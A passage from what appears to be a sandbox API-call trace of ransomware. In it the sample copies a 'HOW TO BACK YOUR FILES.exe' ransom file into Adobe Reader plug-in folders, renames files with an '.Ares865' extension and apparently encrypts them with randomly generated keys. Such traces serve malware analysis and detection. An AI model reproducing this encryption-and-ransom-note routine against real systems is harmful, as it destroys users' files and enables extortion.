hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0058.807] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS") returned 75 [0058.807] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" [0058.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.817] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.817] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.817] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.817] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.817] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" [0058.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335248 | out: hHeap=0x2b0000) returned 1 [0058.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0058.817] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM") returned 75 [0058.817] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" [0058.817] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.817] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.824] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.824] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.824] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.824] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.824] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" [0058.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0058.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0058.824] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL") returned 75 [0058.824] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" [0058.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.831] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.831] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.831] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.831] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.831] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" [0058.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0058.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0058.831] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN") returned 75 [0058.831] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" [0058.832] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.832] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.838] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.838] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.839] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.839] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.839] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" [0058.839] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0058.839] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0058.839] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV") returned 75 [0058.839] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" [0058.839] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.839] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.845] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.845] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.845] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.846] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" [0058.846] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0058.846] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.846] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE") returned 75 [0058.846] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" [0058.846] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.846] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.852] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.852] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.853] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.853] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" [0058.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0058.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.853] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP") returned 71 [0058.853] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" [0058.853] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.853] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.859] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.860] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5496d720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5496d720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.860] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.860] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.860] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CAT.Ares865") returned 89 [0058.860] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cat.ares865"), dwFlags=0x1) returned 1 [0058.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.862] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2560) returned 1 [0058.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.862] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.863] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.863] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.864] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x15c [0058.872] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0058.873] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.873] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.873] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.874] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.874] CloseHandle (hObject=0x15c) returned 1 [0058.874] CloseHandle (hObject=0x164) returned 1 [0058.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.876] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash.CHS", cAlternateFileName="")) returned 1 [0058.876] lstrcmpiW (lpString1="Flash.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.876] lstrcmpiW (lpString1="Flash.CHS", lpString2="aoldtz.exe") returned 1 [0058.876] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.CAT.Ares865") returned 90 [0058.876] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cat.ares865"), dwFlags=0x1) returned 1 [0058.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.877] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8192) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.877] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.878] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x15c [0058.880] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x190000 [0058.881] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.882] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.882] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: 